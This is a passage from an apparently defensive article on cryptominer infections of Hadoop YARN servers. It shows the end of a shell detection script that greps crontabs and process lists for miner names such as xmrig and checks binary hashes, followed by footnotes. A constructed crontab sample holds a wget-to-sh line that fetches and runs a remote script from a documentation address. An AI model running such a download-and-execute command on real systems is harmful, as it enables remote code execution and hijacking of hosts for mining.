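    grep -E '/tmp/[^[:space:]]+[[:space:]]+-c[[:space:]]+/tmp/|cryptonight|sustes|xmrig|xmr-stak|suppoie'
}

# Exit 0 if $1 is one of the MD5 sums cr.sh treats as a valid miner binary.
known_miner_md5() {
    case "$1" in
        c8c1f2da51fbd0aea60e11a81236c9dc|5110222de7330a371c83af67d46c4242) return 0 ;;
        *) return 1 ;;
    esac
}

# Constructed samples: a crontab and a ps listing, each with one hit.
# 198.51.100.7 is a documentation address, not a real indicator.
SAMPLE_CRON='0 3 * * * /usr/local/bin/backup.sh
*/2 * * * * wget -q -O - http://198.51.100.7/cr.sh | sh > /dev/null 2>&1'
SAMPLE_PS='yarn  4242     1  0 10:01 ?  00:12:03 /tmp/java -c /tmp/w.conf
root   812     1  0 09:58 ?  00:00:01 /usr/sbin/sshd -D'

printf '%s\n' "$SAMPLE_CRON" | suspicious_cron && echo "crontab: download-to-shell task found"
printf '%s\n' "$SAMPLE_PS" | suspicious_procs | sed 's/^/process: /'
```

On a live host, replace the samples with `crontab -l` (per user) and `ps -fe`, and feed `md5sum /tmp/java | awk '{print $1}'` to known_miner_md5 when such a file exists.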
9 Open Source Information
10 https:// community.hortonworks.com/questions/189402/why-are-there-drwho-myyarn-applications-running-an.html or https:// stackoverflow.com/questions/50520658/its-seem-that-the-yarn-is-infected-by-trojan-even-if-i-reinstall-my-computer
11 Remote Procedure Call, a general mechanism for managing client-server applications.
12 Advanced Persistent Threat, a type of attack generally carried out by state-based organisations.
(photo: US DoD)